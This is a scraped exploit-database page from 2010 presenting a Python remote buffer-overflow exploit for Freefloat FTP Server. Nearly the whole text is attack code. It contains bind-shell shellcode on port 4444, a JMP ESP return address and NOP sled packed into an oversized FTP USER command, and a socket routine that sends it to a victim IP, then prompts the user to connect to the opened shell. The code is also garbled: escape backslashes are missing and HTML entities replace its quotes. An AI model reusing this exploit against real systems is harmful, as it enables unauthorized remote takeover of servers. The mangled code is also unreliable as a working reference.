Home / os / win7

[remote exploits] - Freefloat FTP Server Buffer Overflow Vul

Posted on 05 December 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Freefloat FTP Server Buffer Overflow Vulnerability 0day | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Freefloat FTP Server Buffer Overflow Vulnerability 0day by 0v3r in remote exploits | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>=======================================================
Freefloat FTP Server Buffer Overflow Vulnerability 0day
=======================================================

# Exploit Title: Freefloat FTP Server Buffer Overflow Vulnerability
# Date: 12/05/2010
# Author: 0v3r
# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
# Tested on: Windows XP SP3 EN
# CVE: N/A
 
#!/usr/bin/python
 
import socket
import sys
 
def usage():
 
        print &quot;usage  : ./freefloatftp.py &lt;victim_ip&gt;  &lt;victim_port&gt;&quot;
        print &quot;example: ./freefloatftp.py 192.168.1.100 21&quot;
 
#Bind Shell shellcode port 4444
shellcode = (&quot;x31xc9xdbxcdxbbxb3x93x96x9dxb1x56xd9x74x24xf4&quot;
&quot;x5ax31x5ax17x83xeaxfcx03x5ax13x51x66x6ax75x1c&quot;
&quot;x89x93x86x7ex03x76xb7xacx77xf2xeax60xf3x56x07&quot;
&quot;x0bx51x43x9cx79x7ex64x15x37x58x4bxa6xf6x64x07&quot;
&quot;x64x99x18x5axb9x79x20x95xccx78x65xc8x3fx28x3e&quot;
&quot;x86x92xdcx4bxdax2exddx9bx50x0exa5x9exa7xfbx1f&quot;
&quot;xa0xf7x54x14xeaxefxdfx72xcbx0ex33x61x37x58x38&quot;
&quot;x51xc3x5bxe8xa8x2cx6axd4x66x13x42xd9x77x53x65&quot;
&quot;x02x02xafx95xbfx14x74xe7x1bx91x69x4fxefx01x4a&quot;
&quot;x71x3cxd7x19x7dx89x9cx46x62x0cx71xfdx9ex85x74&quot;
&quot;xd2x16xddx52xf6x73x85xfbxafxd9x68x04xafx86xd5&quot;
&quot;xa0xbbx25x01xd2xe1x21xe6xe8x19xb2x60x7bx69x80&quot;
&quot;x2fxd7xe5xa8xb8xf1xf2xcfx92x45x6cx2ex1dxb5xa4&quot;
&quot;xf5x49xe5xdexdcxf1x6ex1fxe0x27x20x4fx4ex98x80&quot;
&quot;x3fx2ex48x68x2axa1xb7x88x55x6bxcex8fx9bx4fx82&quot;
&quot;x67xdex6fx34x2bx57x89x5cxc3x31x01xc9x21x66x9a&quot;
&quot;x6ex5ax4cxb6x27xccxd8xd0xf0xf3xd8xf6x52x58x70&quot;
&quot;x91x20xb2x45x80x36x9fxedxcbx0ex77x67xa2xddxe6&quot;
&quot;x78xefxb6x8bxebx74x47xc2x17x23x10x83xe6x3axf4&quot;
&quot;x39x50x95xebxc0x04xdexa8x1exf5xe1x31xd3x41xc6&quot;
&quot;x21x2dx49x42x16xe1x1cx1cxc0x47xf7xeexbax11xa4&quot;
&quot;xb8x2axe4x86x7ax2dxe9xc2x0cxd1x5bxbbx48xedx53&quot;
&quot;x2bx5dx96x8excbxa2x4dx0bxfbxe8xccx3dx94xb4x84&quot;
&quot;x7cxf9x46x73x42x04xc5x76x3axf3xd5xf2x3fxbfx51&quot;
&quot;xeex4dxd0x37x10xe2xd1x1dx1a&quot;)
 
 
junk1  = &quot;x41&quot; * 230
eip    = &quot;x53x93x42x7E&quot;  #7E429353 JMP ESP
nops   = &quot;x90&quot; * 16
junk2  = &quot;x43&quot; * (1000 - len(junk1 + eip + nops + shellcode))
 
buff   = junk1 + eip + nops + shellcode + junk2
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
 
print &quot;
&quot; 
print &quot;----------------------------------------------------------------&quot;
print &quot;|      Freefloat FTP Server Buffer Overflow Vulnerability      |&quot;
print &quot;----------------------------------------------------------------&quot;
print &quot;
&quot;
 
 
if len(sys.argv) != 3:
    usage()
        sys.exit()
 
ip   = sys.argv[1]
port = sys.argv[2]
 
try:
    print(&quot;[-] Connecting to &quot; + ip + &quot; on port &quot; + port + &quot;
&quot;)
    s.connect((ip,int(port)))
    data = s.recv(1024)
    print(&quot;[-] Sending exploit...&quot;)
    s.send(&#039;USER &#039; + buff + &#039;
&#039;)
    s.close()
    print(&quot;[-] Exploit successfully sent...&quot;)
    print(&quot;[-] Connect to &quot; + ip + &quot; on port 4444&quot;)
except:
    print(&quot;[-] Connection error...&quot;)
    print(&quot;[-] Check if victim is up.&quot;)


# <a href='http://1337db.com/'>1337db.com</a> [2010-12-05]</pre></body></html>

 

TOP